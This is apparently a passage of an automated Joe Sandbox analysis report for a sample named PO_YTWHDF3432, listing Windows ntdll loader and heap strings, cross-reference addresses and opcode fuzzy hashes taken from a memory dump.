                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-204845295
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01958181, 019581F5
                                                                          • LdrpInitializeImportRedirection, xrefs: 01958177, 019581EB
                                                                          • Loading import redirection DLL: '%wZ', xrefs: 01958170
                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 019581E5
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0191C6C3
                                                                          • LdrpInitializeProcess, xrefs: 0191C6C4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 0-475462383
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019521BF
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01952180
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01952178
                                                                          • SXS: %s() passed the empty activation context, xrefs: 01952165
                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0195219F
                                                                          • RtlGetAssemblyStorageRoot, xrefs: 01952160, 0195219A, 019521BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                          • API String ID: 0-861424205
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 01922DF0: LdrInitializeThunk.NTDLL ref: 01922DFA
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01920BA3
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01920BB6
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01920D60
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01920D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 1404860816-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                          • API String ID: 0-3126994380
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                          • API String ID: 0-379654539
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0191855E
                                                                          • LdrpInitializeProcess, xrefs: 01918422
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01918421
                                                                          • @, xrefs: 01918591
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1918872054
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019522B6
                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019521D9, 019522B1
                                                                          • SXS: %s() passed the empty activation context, xrefs: 019521DE
                                                                          • .Local, xrefs: 019128D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                          • API String ID: 0-1239276146
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0195342A
                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01953437
                                                                          • RtlDeactivateActivationContext, xrefs: 01953425, 01953432, 01953451
                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01953456
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                          • API String ID: 0-1245972979
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0194106B
                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01941028
                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01940FE5
                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019410AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                          • API String ID: 0-1468400865
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • LdrpDynamicShimModule, xrefs: 0194A998
                                                                          • apphelp.dll, xrefs: 01902462
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0194A9A2
                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0194A992
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-176724104
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-4253913091
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $@
                                                                          • API String ID: 0-1077428164
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                          • API String ID: 0-2779062949
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • LdrpCheckModule, xrefs: 0194A117
                                                                          • Failed to allocated memory for shimmed module list, xrefs: 0194A10F
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0194A121
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-161242083
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-1334570610
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 019582DE
                                                                          • Failed to reallocate the system dirs string !, xrefs: 019582D7
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 019582E8
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1783798831
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0199C1C5
                                                                          • @, xrefs: 0199C1F1
                                                                          • PreferredUILanguages, xrefs: 0199C212
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                          • API String ID: 0-2968386058
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                          • API String ID: 0-1373925480
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01964888
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01964899
                                                                          • LdrpCheckRedirection, xrefs: 0196488F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 0-3154609507
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-2558761708
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • Process initialization failed with status 0x%08lx, xrefs: 019620F3
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01962104
                                                                          • LdrpInitializationFailure, xrefs: 019620FA
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2986994758
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: #%u
                                                                          • API String ID: 48624451-232158463
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • LdrResSearchResource Enter, xrefs: 018EAA13
                                                                          • LdrResSearchResource Exit, xrefs: 018EAA25
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                          • API String ID: 0-4066393604
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `$`
                                                                          • API String ID: 0-197956300
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Legacy$UEFI
                                                                          • API String ID: 2994545307-634100481
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$MUI
                                                                          • API String ID: 0-17815947
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 018E063D
                                                                          • kLsE, xrefs: 018E0540
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                          • API String ID: 0-2547482624
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 018EA2FB
                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 018EA309
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                          • API String ID: 0-2876891731
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Cleanup Group$Threadpool!
                                                                          • API String ID: 2994545307-4008356553
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: MUI
                                                                          • API String ID: 0-1339004836
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: GlobalTags
                                                                          • API String ID: 0-1106856819
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .mui
                                                                          • API String ID: 0-1199573805
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: EXT-
                                                                          • API String ID: 0-1948896318
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BinaryHash
                                                                          • API String ID: 0-2202222882
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #
                                                                          • API String ID: 0-1885708031
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BinaryName
                                                                          • API String ID: 0-215506332
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0196895E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                          • API String ID: 0-702105204
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b0d0ae13cefa6a80668c120f1a3c68b9cf30ba23429e87924a4b0b319394b002
                                                                          • Instruction ID: 30242e1224a848a3f4da418010751de38a4d6b1899ccdc5a551a4ecfde10bdb5
                                                                          • Opcode Fuzzy Hash: b0d0ae13cefa6a80668c120f1a3c68b9cf30ba23429e87924a4b0b319394b002
                                                                          • Instruction Fuzzy Hash: 14C158745083418FE764CF19C484BABB7E4FF88308F44496DE98987291DB74EA48CF92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8cc8e8b183bf09d1718c07c30ba63b3a79fd99229271d39c281058204fd202d5
                                                                          • Instruction ID: d7e56f7f9c0718b1eac0b175ebfd14f0e1bf35a6a414d3d1cfc73cba5561c865
                                                                          • Opcode Fuzzy Hash: 8cc8e8b183bf09d1718c07c30ba63b3a79fd99229271d39c281058204fd202d5
                                                                          • Instruction Fuzzy Hash: A7B16270A002698BDB25DF58C890BA9B7B5BF84704F5485EDE54EE7281DB309E85CB21
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 97b468f8c95fddb6c2718d3a3b5da9681e0568c2fc48e3bf4366486d48f3e572
